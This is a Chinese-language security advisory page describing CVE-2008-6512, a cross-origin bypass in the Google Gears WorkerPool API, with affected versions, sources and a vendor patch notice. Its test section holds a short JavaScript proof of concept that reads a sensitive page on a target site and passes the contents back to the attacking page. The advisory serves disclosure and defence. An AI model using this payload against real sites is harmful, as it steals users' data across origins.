安全研究
安全漏洞
安全漏洞
所有系统
AIX
BSD(eg,OpenBSD)
Digital Unix
HP-UX
IRIX
Linux
FreeBSD
SCO UNIX
SunOS
Solaris
Windows
所有类型
远程进入系统
本地越权访问
拒绝服务攻击
嵌入恶意代码
Web数据接口
其他类型
Google Gears WorkerPool API绕过同源策略漏洞
发布日期:
2008-12-08
更新日期:
2009-03-25
受影响系统:
Google Gears < 0.5.4.2
不受影响系统:
Google Gears 0.5.4.2
描述:
BUGTRAQ ID:
32698
CVE(CAN) ID:
CVE-2008-6512
Google Gears是一个开源浏览器扩展,允许开发者开发离线网络程序。
Google Gears的WorkerPool API中存在跨域安全漏洞。如果攻击者在目标域上放置了包含有Google Gear命令的文件类型,然后从攻击域访问该文件,由于没有检查攻击域的响应头,因此可能绕过allowCrossOrigin函数的访问限制在目标域中运行worker代码。
<*来源:Yair Amit (
AMITYAIR@il.ibm.com
)
链接:
http://secunia.com/advisories/33062/
http://lists.grok.org.uk/pipermail/full-disclosure/2008-December/066291.html
http://blog.watchfire.com/wfblog/2008/12/breaking-google-gears-cross-origin-communication-model.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
var wp = google.gears.workerPool;
wp.allowCrossOrigin();
wp.onmessage = function(a, b, message) {
var request = google.gears.factory.create('beta.httprequest');
request.open('GET', '
http://TARGET.SITE/SENSITIVE_PAGE.htm');
request.onreadystatechange = function() {
if (request.readyState == 4) {
wp.sendMessage("The response was: " +
request.responseText, message.sender);
}
};
request.send();
}
建议:
厂商补丁:
Google
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.google.com
浏览次数:
2601
严重程度:
0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客
